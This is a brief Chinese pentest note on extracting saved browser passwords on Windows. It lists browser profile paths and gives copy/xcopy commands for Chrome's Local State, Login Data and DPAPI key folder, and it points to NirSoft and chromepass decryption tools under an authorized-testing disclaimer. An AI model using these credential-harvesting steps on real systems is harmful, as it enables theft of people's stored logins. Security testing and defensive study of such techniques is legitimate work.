【渗透笔记】浏览器

常见浏览器数据默认存储路径：

• 360chrome
  C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default
• 360浏览器
  C:\Users\Administrator\AppData\Roaming\360se6\User Data\Default
• QQ浏览器：
  C:\Users\Administrator\AppData\Local\Tencent\QQBrowser\User Data\Default
• 谷歌chrome
  C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default
• 火狐浏览器
  C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxx.default
• 搜狗浏览器
  C:\Users\Administrator\AppData\Roaming\SogouExplorer\

明文密码获取

本处以Chrome为例：
总共需要三处文件：

C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect

可以进行手动拉取也可借助命令行完成：

copy "C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Local State" .
copy "C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Login Data" .
xcopy %AppData%\Microsoft\Protect .\key /C /S /Q /I /H

相关解密工具可以在这里获取，注意工具会报毒。
http://www.nirsoft.net/password_recovery_tools.html

另外，需要对应账户的密码，这个自行解决。

除了以上利用方案，也可参考darkArp的python工具，在此仅作mark。
https://github.com/darkarp/chromepass

本章内容仅用于授权测试，请勿用于非法用途，请遵守游戏规则。